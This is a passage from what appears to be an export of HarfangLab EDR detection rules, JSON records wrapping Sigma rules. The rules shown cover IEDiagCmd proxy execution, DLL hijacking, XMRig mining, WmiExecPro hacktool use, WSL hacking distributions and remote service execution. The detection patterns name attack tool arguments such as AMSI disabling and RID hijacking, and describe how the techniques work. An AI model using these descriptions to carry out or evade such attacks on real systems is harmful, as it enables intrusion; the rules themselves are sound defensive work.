'?:\\Windows\\System32\\ipconfig.exe'\n - '?:\\Windows\\System32\\route.exe'\n - '?:\\Windows\\System32\\netsh.exe'\n - '?:\\Windows\\System32\\makecab.exe'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "51195556-a3b2-47a1-b067-fefb536cee6d",
"rule_name": "Proxy Execution via IEDiagCmd.exe",
"rule_description": "Detects a binary launched by the legitimate IEDiagCmd.exe utility from a location other than the expected System32 directory.\nIEDiagCmd.exe is a diagnostics utility for Internet Explorer that can be abused to proxy execution of arbitrary payloads.\nWhen the \"%WINDIR%\" environment variable is modified and IEDiagCmd.exe is executed with the /out parameter, it launches its helper tools (ipconfig.exe, route.exe, netsh.exe and makecab.exe) from the modified path (e.g. \"C:\\test\\system32\\netsh.exe\") instead of the real System32 directory.\nThis behavior may indicate abuse of the IEDiagCmd LOLBin technique to execute attacker-controlled binaries through a trusted Windows process, bypassing security controls.\nIt is recommended to verify whether the windir environment variable was modified prior to execution, and to examine the launched binary (path, signature and hash) to determine whether this activity was legitimate.\n",
"rule_creation_date": "2025-06-13",
"rule_modified_date": "2025-06-20",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1574.008"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "51361589-98fe-4662-a6f3-76ae1ba32fe2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.086274Z",
"creation_date": "2026-03-23T11:45:34.086276Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.086281Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_musnotification.yml",
"content": "title: DLL Hijacking via musnotification.exe\nid: 51361589-98fe-4662-a6f3-76ae1ba32fe2\ndescription: |\n Detects potential Windows DLL hijacking via a relocated copy of musnotification.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\n An alert means that musnotification.exe, running from outside the Windows system directories (System32, SysWOW64 or WinSxS), loaded one of its dependencies from a non-system location and that library is not signed by Microsoft Windows.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'musnotification.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\Cabinet.dll'\n - '\\UpdatePolicy.dll'\n - '\\UPShared.dll'\n - '\\USERENV.dll'\n - '\\WINHTTP.dll'\n - '\\WINSTA.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "51361589-98fe-4662-a6f3-76ae1ba32fe2",
"rule_name": "DLL Hijacking via musnotification.exe",
"rule_description": "Detects potential Windows DLL hijacking via a relocated copy of musnotification.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\nAn alert means that musnotification.exe, running from outside the Windows system directories (System32, SysWOW64 or WinSxS), loaded one of its dependencies from a non-system location and that library is not signed by Microsoft Windows.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "515b9032-e1d4-442f-8fc9-0b5ee25854c3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.613795Z",
"creation_date": "2026-03-23T11:45:34.613799Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.613806Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://xmrig.com/docs/miner/command-line-options",
"https://attack.mitre.org/techniques/T1496/"
],
"name": "t1496_xmrig_cryptominer_commandline_args_linux.yml",
"content": "title: Possible XMRig Execution (Linux)\nid: 515b9032-e1d4-442f-8fc9-0b5ee25854c3\ndescription: |\n Detects suspicious command-line arguments commonly associated with XMRig execution.\n XMRig is an open-source cryptocurrency mining software often abused by adversaries to mine Monero on infected systems.\n It is recommended to investigate the source of such arguments, monitor for irregular mining activity, analyze the process chain leading to the execution, and review network traffic.\n Consider terminating suspicious processes and isolating the affected system for further analysis.\nreferences:\n - https://xmrig.com/docs/miner/command-line-options\n - https://attack.mitre.org/techniques/T1496/\ndate: 2022/11/15\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.impact\n - attack.t1496\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.CryptoMiner.XMRig\n - classification.Linux.Behavior.CryptoMiner\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n CommandLine|contains:\n - ' --rig-id'\n - ' --argon2-impl'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "515b9032-e1d4-442f-8fc9-0b5ee25854c3",
"rule_name": "Possible XMRig Execution (Linux)",
"rule_description": "Detects suspicious command-line arguments commonly associated with XMRig execution.\nXMRig is an open-source cryptocurrency mining software often abused by adversaries to mine Monero on infected systems.\nIt is recommended to investigate the source of such arguments, monitor for irregular mining activity, analyze the process chain leading to the execution, and review network traffic.\nConsider terminating suspicious processes and isolating the affected system for further analysis.\n",
"rule_creation_date": "2022-11-15",
"rule_modified_date": "2025-04-14",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.impact"
],
"rule_technique_tags": [
"attack.t1496"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5189d993-9c1a-40b7-981c-00057f326e96",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.599685Z",
"creation_date": "2026-03-23T11:45:34.599689Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.599696Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_microsoftedgebchost.yml",
"content": "title: DLL Hijacking via microsoftedgebchost.exe\nid: 5189d993-9c1a-40b7-981c-00057f326e96\ndescription: |\n Detects potential Windows DLL hijacking via a relocated copy of microsoftedgebchost.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\n An alert means that microsoftedgebchost.exe, running from outside the Windows system directories (System32, SysWOW64 or WinSxS), loaded one of its dependencies from a non-system location and that library is not signed by Microsoft Windows.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'microsoftedgebchost.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\iertutil.dll'\n - '\\USERENV.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5189d993-9c1a-40b7-981c-00057f326e96",
"rule_name": "DLL Hijacking via microsoftedgebchost.exe",
"rule_description": "Detects potential Windows DLL hijacking via a relocated copy of microsoftedgebchost.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\nAn alert means that microsoftedgebchost.exe, running from outside the Windows system directories (System32, SysWOW64 or WinSxS), loaded one of its dependencies from a non-system location and that library is not signed by Microsoft Windows.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "518c2cf8-5933-4ec7-b1a9-bf85a9b376a7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.608686Z",
"creation_date": "2026-03-23T11:45:34.608689Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.608696Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/XiaoliChan/wmiexec-Pro",
"https://attack.mitre.org/techniques/T1047/"
],
"name": "t1047_wmiexecpro.yml",
"content": "title: WMIExecPro HackTool Executed\nid: 518c2cf8-5933-4ec7-b1a9-bf85a9b376a7\ndescription: |\n Detects the default command-line arguments of WmiExecPro.\n Windows Management Instrumentation (WMI) allows remote control and management of Windows systems, and WmiExecPro is a Python tool often used by attackers for remote command execution, AMSI bypass, RDP and firewall manipulation, VBScript execution and RID hijacking over WMI.\n Because the rule matches the Python process running the WmiExecPro client, it fires on the host launching the tool (for example a compromised pivot host), not on the remote target; the targeted hosts should be identified from the command line.\n It is recommended to investigate the source of the WmiExecPro execution, review network traffic for suspicious WMI activities toward the targeted hosts, and assess whether the command-line arguments are legitimate or indicative of malicious intent.\nreferences:\n - https://github.com/XiaoliChan/wmiexec-Pro\n - https://attack.mitre.org/techniques/T1047/\ndate: 2023/09/01\nmodified: 2025/02/07\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1047\n - attack.defense_evasion\n - attack.t1562.001\n - attack.t1562.006\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.HackTool.WmiExecPro\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'python.exe'\n\n selection_cmd_amsi:\n CommandLine|contains|all:\n - ' amsi '\n - ' -disable'\n\n selection_cmd_exec_command_1:\n CommandLine|contains: ' exec-command '\n\n selection_cmd_exec_command_2:\n CommandLine|contains:\n - ' -shell'\n - ' -command'\n - ' -silent'\n\n selection_cmd_rdp_1:\n CommandLine|contains: ' rdp '\n\n selection_cmd_rdp_2:\n CommandLine|contains:\n - ' -enable'\n - ' -enable-ram'\n - ' -disable'\n - ' -disable-ram'\n\n selection_cmd_firewall_1:\n CommandLine|contains: ' firewall '\n\n selection_cmd_firewall_2:\n CommandLine|contains:\n - ' -dump'\n - ' -search-port'\n - ' -rule-id'\n - ' -firewall-profile'\n\n selection_cmd_execute_vbs_1:\n CommandLine|contains: ' execute-vbs '\n\n selection_cmd_execute_vbs_2:\n CommandLine|contains:\n - ' -vbs'\n - ' -filter'\n - ' -timer'\n - ' -remove'\n - ' -deep-clean'\n\n 
selection_cmd_rid_hijack_1:\n CommandLine|contains: ' rid-hijack '\n\n selection_cmd_rid_hijack_2:\n CommandLine|contains:\n - ' -query'\n - ' -user'\n - ' -hijack-rid'\n - ' -action'\n - ' -blank-pass-login'\n - ' -restore'\n\n condition: selection and (\n selection_cmd_amsi or\n all of selection_cmd_exec_command_* or\n all of selection_cmd_rdp_* or\n all of selection_cmd_firewall_* or\n all of selection_cmd_execute_vbs_* or\n all of selection_cmd_rid_hijack_*)\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "518c2cf8-5933-4ec7-b1a9-bf85a9b376a7",
"rule_name": "WMIExecPro HackTool Executed",
"rule_description": "Detects the default command-line arguments of WmiExecPro.\nWindows Management Instrumentation (WMI) allows remote control and management of Windows systems, and WmiExecPro is a Python tool often used by attackers for remote command execution, AMSI bypass, RDP and firewall manipulation, VBScript execution and RID hijacking over WMI.\nBecause the rule matches the Python process running the WmiExecPro client, it fires on the host launching the tool (for example a compromised pivot host), not on the remote target; the targeted hosts should be identified from the command line.\nIt is recommended to investigate the source of the WmiExecPro execution, review network traffic for suspicious WMI activities toward the targeted hosts, and assess whether the command-line arguments are legitimate or indicative of malicious intent.\n",
"rule_creation_date": "2023-09-01",
"rule_modified_date": "2025-02-07",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1047",
"attack.t1562.001",
"attack.t1562.006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "51ab3513-a96b-4ba0-ba57-465e81bdb29c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.617738Z",
"creation_date": "2026-03-23T11:45:34.617740Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.617745Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://cloud.google.com/blog/topics/threat-intelligence/north-korea-supply-chain/?hl=en",
"https://attack.mitre.org/techniques/T1105/"
],
"name": "t1105_ruby_file_create_susp_location.yml",
"content": "title: File Created in Suspicious Folder via Ruby\nid: 51ab3513-a96b-4ba0-ba57-465e81bdb29c\ndescription: |\n Detects a file creation by Ruby in a suspicious location.\n Adversaries may use Ruby to download and execute further tools.\n It is recommended to check the content of the created file to determine its legitimacy.\nreferences:\n - https://cloud.google.com/blog/topics/threat-intelligence/north-korea-supply-chain/?hl=en\n - https://attack.mitre.org/techniques/T1105/\ndate: 2024/09/26\nmodified: 2025/03/06\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1105\n - classification.macOS.Source.Filesystem\n - classification.macOS.Script.Ruby\n - classification.macOS.Behavior.CommandAndControl\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection:\n Image|endswith: '/ruby'\n Kind: 'create'\n Path|startswith:\n - '/usr/local/bin/'\n - '/users/shared/'\n - '/private/etc/'\n\n exclusion_homebrew:\n Image|startswith: '/usr/local/Homebrew/'\n Path|startswith: '/usr/local/bin/'\n\n exclusion_gem:\n Path|startswith: '/usr/local/bin'\n ProcessParentCommandLine|contains: 'gem install '\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "51ab3513-a96b-4ba0-ba57-465e81bdb29c",
"rule_name": "File Created in Suspicious Folder via Ruby",
"rule_description": "Detects a file creation by Ruby in a suspicious location.\nAdversaries may use Ruby to download and execute further tools.\nIt is recommended to check the content of the created file to determine its legitimacy.\n",
"rule_creation_date": "2024-09-26",
"rule_modified_date": "2025-03-06",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1105"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "51ee3e20-cde8-4c82-a9d2-51a87360411b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.297255Z",
"creation_date": "2026-03-23T11:45:35.297257Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.297261Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://blog.qualys.com/vulnerabilities-threat-research/2022/03/22/implications-of-windows-subsystem-for-linux-for-adversaries-defenders-part-1",
"https://blog.qualys.com/vulnerabilities-threat-research/2022/04/20/implications-of-windows-subsystem-for-linux-for-adversaries-defenders-part-2",
"https://en.wikipedia.org/wiki/Windows_Subsystem_for_Linux",
"https://attack.mitre.org/techniques/T1202/"
],
"name": "t1202_wsl_hacking_distribution_installation.yml",
"content": "title: Hacking Distribution Installed Under WSL\nid: 51ee3e20-cde8-4c82-a9d2-51a87360411b\ndescription: |\n Detects the registration of a Linux distribution whose name matches a known hacking distribution under Windows Subsystem for Linux (WSL).\n Popular hacking distributions provide pre-installed penetration testing and security assessment tools that could be leveraged for malicious purposes.\n Threat actors may abuse WSL to evade Windows security controls and execute malicious code.\n The detection relies solely on the registered DistributionName value, so a distribution imported under a different name is not covered, and a legitimate security team installing one of these distributions will trigger it.\n It is recommended to verify whether the installation is expected for the user, and to monitor process trees and subsequent WSL activities for signs of malicious behavior.\nreferences:\n - https://blog.qualys.com/vulnerabilities-threat-research/2022/03/22/implications-of-windows-subsystem-for-linux-for-adversaries-defenders-part-1\n - https://blog.qualys.com/vulnerabilities-threat-research/2022/04/20/implications-of-windows-subsystem-for-linux-for-adversaries-defenders-part-2\n - https://en.wikipedia.org/wiki/Windows_Subsystem_for_Linux\n - https://attack.mitre.org/techniques/T1202/\ndate: 2025/01/06\nmodified: 2026/03/03\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1202\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject|contains: '\\Software\\Microsoft\\Windows\\CurrentVersion\\Lxss\\\\*\\DistributionName'\n Details|contains:\n - 'kali-linux'\n - 'Athena'\n - 'ParrotOS'\n\n condition: selection\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "51ee3e20-cde8-4c82-a9d2-51a87360411b",
"rule_name": "Hacking Distribution Installed Under WSL",
"rule_description": "Detects the registration of a Linux distribution whose name matches a known hacking distribution under Windows Subsystem for Linux (WSL).\nPopular hacking distributions provide pre-installed penetration testing and security assessment tools that could be leveraged for malicious purposes.\nThreat actors may abuse WSL to evade Windows security controls and execute malicious code.\nThe detection relies solely on the registered DistributionName value, so a distribution imported under a different name is not covered, and a legitimate security team installing one of these distributions will trigger it.\nIt is recommended to verify whether the installation is expected for the user, and to monitor process trees and subsequent WSL activities for signs of malicious behavior.\n",
"rule_creation_date": "2025-01-06",
"rule_modified_date": "2026-03-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1202"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "52550a8d-626b-41ed-8999-c4d5ffca7060",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.087381Z",
"creation_date": "2026-03-23T11:45:34.087383Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.087388Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/post-exploitation_lateral-movement.htm",
"https://attack.mitre.org/techniques/T1036/004/"
],
"name": "t1036_004_service_image_remote.yml",
"content": "title: Remote Image Executed as a Service\nid: 52550a8d-626b-41ed-8999-c4d5ffca7060\ndescription: |\n Detects services.exe starting a service binary referenced through a UNC path to an ADMIN$ share rather than a local path, a technique commonly employed in lateral movement.\n This method, notably used by Cobalt Strike's PsExec module, allows attackers to move laterally by creating services on remote systems that execute malicious payloads.\n While legitimate administrative tools may use similar techniques (Microsoft Configuration Manager and Raynet RayManageSoft remote execution are excluded), unauthorized remote service execution often indicates adversary activity.\n Note that the Raynet exclusion relies on PE version metadata only (product, company and description) without a signature check, so a binary carrying forged metadata would not be reported.\n It is recommended to investigate the source of remote service creation, validate the legitimacy of the service binary path and of the host referenced in it, and correlate with authentication logs to identify potential lateral movement attempts.\nreferences:\n - https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/post-exploitation_lateral-movement.htm\n - https://attack.mitre.org/techniques/T1036/004/\ndate: 2020/12/09\nmodified: 2025/07/30\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1036.004\n - attack.execution\n - attack.t1569.002\n - attack.lateral_movement\n - attack.t1021.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Lateralization\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n ParentImage|endswith: '\\Windows\\System32\\services.exe'\n Image: '\\\\\\\\*\\ADMIN$\\\\*.exe'\n exclusion_microsoft_configuration_mgr:\n ProcessSigned: 'true'\n ProcessProduct: 'Microsoft Configuration Manager'\n ProcessSignature: 'Microsoft Corporation'\n exclusion_raynet:\n ProcessProduct: 'RayManageSoft'\n ProcessCompany: 'Raynet GmbH'\n ProcessDescription: 'Remote Execution Service'\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "52550a8d-626b-41ed-8999-c4d5ffca7060",
"rule_name": "Remote Image Executed as a Service",
"rule_description": "Detects attempts to execute remote images through service creation and installation, a technique commonly employed in lateral movement.\nThis method, notably used by Cobalt Strike's PsExec module, allows attackers to move laterally by creating services on remote systems that execute malicious payloads.\nWhile legitimate administrative tools may use similar techniques, unauthorized remote service execution often indicates adversary activity.\nIt is recommended to investigate the source of remote service creation, validate the legitimacy of the service binary path, and correlate with authentication logs to identify potential lateral movement attempts.\n",
"rule_creation_date": "2020-12-09",
"rule_modified_date": "2025-07-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021.002",
"attack.t1036.004",
"attack.t1569.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5258ce45-d23f-411e-8ffe-675a220f6420",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
